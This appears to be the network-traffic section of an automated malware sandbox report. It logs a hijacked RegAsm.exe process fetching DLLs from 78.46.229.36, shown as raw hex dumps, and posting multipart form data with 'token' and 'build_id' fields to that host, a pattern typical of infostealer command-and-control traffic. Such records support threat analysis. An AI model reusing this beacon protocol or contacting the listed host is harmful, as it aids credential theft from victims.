                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  ETag: "6315a9f4-3ef50"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2024-03-29 11:08:14 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                                                                  2024-03-29 11:08:14 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                                                                                                                                                                                                  Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                                                                                                                                                                                                  2024-03-29 11:08:14 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                                                                                                                                                                                                  Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                                                                                                                                                                                                  2024-03-29 11:08:14 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                                                                                                                                                                                                  Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                                                                                                                                                                                                  2024-03-29 11:08:14 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                                                                                                                                                                                                  Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                                                                                                                                                                                                  2024-03-29 11:08:15 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                                                                                                                                                                                                  Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                                                                                                                                                                                                  2024-03-29 11:08:15 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                                                                                                                                                                                                  Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                                                                                                                                                                                                  2024-03-29 11:08:15 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                                                                                                                                                                                                  Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                                                                                                                                                                                                  2024-03-29 11:08:15 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                                                                                                                                                                                                  Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                                                                                                                                                                                  2024-03-29 11:08:15 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                                                                                                                                                                                  Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  16192.168.2.44975978.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:15 UTC210OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:16 UTC245INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:16 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 80880
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  ETag: "6315a9f4-13bf0"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2024-03-29 11:08:16 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                                                                  2024-03-29 11:08:16 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                                                                                                                                                                                                  Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                                                                                                                                                                                                  2024-03-29 11:08:16 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                                                                                                                                                                                                  Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                                                                                                                                                                                                  2024-03-29 11:08:16 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                                                                                                                                                                                                  Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                                                                                                                                                                                                  2024-03-29 11:08:16 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                                                                                                                                                                                                  Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  17192.168.2.44976078.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:17 UTC311OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKE
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 1145
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:17 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------JDAFHCGIJECFHIDGDBKECont
                                                                                                                                                                                                                                                  2024-03-29 11:08:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:17 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:08:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  18192.168.2.44976178.46.229.364437564C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-03-29 11:08:18 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJ
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 78.46.229.36
                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-03-29 11:08:18 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 35 35 36 35 65 31 35 33 31 36 35 34 35 38 37 38 33 39 37 39 66 38 39 31 35 63 65 38 31 65 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 30 30 32 37 65 33 35 66 36 63 62 35 34 38 34 38 30 61 36 66 62 38 62 64 37 63 64 65 30 63 66 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="token"a5565e153165458783979f8915ce81e0------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="build_id"90027e35f6cb548480a6fb8bd7cde0cf------AFBFHDBKJEGHJJJKFIIJCont
                                                                                                                                                                                                                                                  2024-03-29 11:08:19 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:19 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
